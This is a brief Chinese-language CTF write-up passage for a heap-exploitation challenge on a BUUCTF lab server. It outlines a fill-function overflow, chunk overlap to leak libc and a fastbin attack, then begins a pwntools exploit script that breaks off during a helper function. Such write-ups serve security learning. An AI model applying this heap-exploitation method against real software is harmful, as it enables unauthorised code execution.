例行检查
保护全开。
分析程序。在fill函数中存在溢出,通overlap,泄露libc。然后fastbin attack。
from pwn import *
io=remote('node3.buuoj.cn',27627)
libc=ELF('./libc-2.23.so')
def add(size):
io.recvuntil('Command: ')
io.sendline('1')
io.recvuntil('Size: ')
io.sendline(str(size))
def edit(idx,size,data):
io.recvuntil('Command: ')
io.sendline